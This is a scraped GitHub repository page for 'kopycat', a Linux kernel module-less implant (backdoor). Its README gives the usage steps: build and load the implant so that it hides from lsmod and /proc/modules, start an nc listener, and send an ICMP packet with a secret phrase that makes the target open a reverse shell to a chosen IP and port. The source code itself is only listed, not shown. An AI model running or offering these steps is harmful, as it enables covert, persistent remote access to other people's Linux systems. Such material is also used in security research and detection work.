8000 GitHub - ssfdust/kopycat: Linux Kernel module-less implant (backdoor)
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

ssfdust/kopycat

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
tools
tools
 
 
.envrc
.envrc
 
 
.gitignore
.gitignore
 
 
Kbuild
Kbuild
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
Vagrantfile
Vagrantfile
 
 
main.c
main.c
 
 
payload.c
payload.c
 
 
payload.lds
payload.lds
 
 
shell.nix
shell.nix
 
 
trigger.c
trigger.c
 
 

Repository files navigation

0

KOPYCAT - Linux Kernel module-less implant (backdoor)

Usage

$ make
$ make trigger
$ sudo insmod kopycat.ko
insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device
$
57AA
 lsmod | grep kopycat
$ cat /proc/modules | grep kopycat

Launch nc listener:

$ nc -l 8087

Trigger the backdoor by sending ICMP packet with secret phrase:

$ sudo ./trigger <target_ip> <reversed_ip> <reversed_port>

Author

Ilya V. Matveychikov

2021

About

Linux Kernel module-less implant (backdoor)

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C 87.0%
  • Makefile 9.0%
  • Nix 2.4%
  • Shell 1.6%
0